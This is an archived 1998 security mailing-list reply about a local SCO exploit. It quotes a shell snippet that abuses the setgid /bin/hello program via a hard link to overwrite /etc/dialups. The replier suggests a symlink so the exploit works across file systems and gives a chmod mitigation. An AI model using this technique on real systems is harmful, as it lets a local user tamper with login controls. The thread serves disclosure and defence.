Re: Fw: Exploit for SCO.

From: John W. Temples (johnat_private)
Date: Fri Sep 11 1998 - 16:20:48 PDT

Next message: Daniel Alex Finkelstein: "Re: hey, guess what! another Irix buffer overflow!"

Previous message: Scott Fuhrman: "Re: security problems with jidentd"
Maybe in reply to: Leshka: "Fw: Exploit for SCO."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Thu, 10 Sep 1998, Leshka wrote:

> tty=`tty`;ttyfile=`pwd`/`basename $tty`
> echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to
> disable"
> echo "login or just type <CTRL>-D to login enable. Sorry for the manual
> work."
> ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile

The exploit fails if your CWD is not in the same file system as /etc.
Using a symbolic rather than a hard link fixes that.

The exploit can be defeated with:

# chmod g-s /bin/hello

--
John W. Temples, III       ||       Providing the first public access Internet
Gulfnet Kuwait             ||            site in the Arabian Gulf region

Next message: Daniel Alex Finkelstein: "Re: hey, guess what! another Irix buffer overflow!"
Previous message: Scott Fuhrman: "Re: security problems with jidentd"
Maybe in reply to: Leshka: "Fw: Exploit for SCO."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:16:10 PDT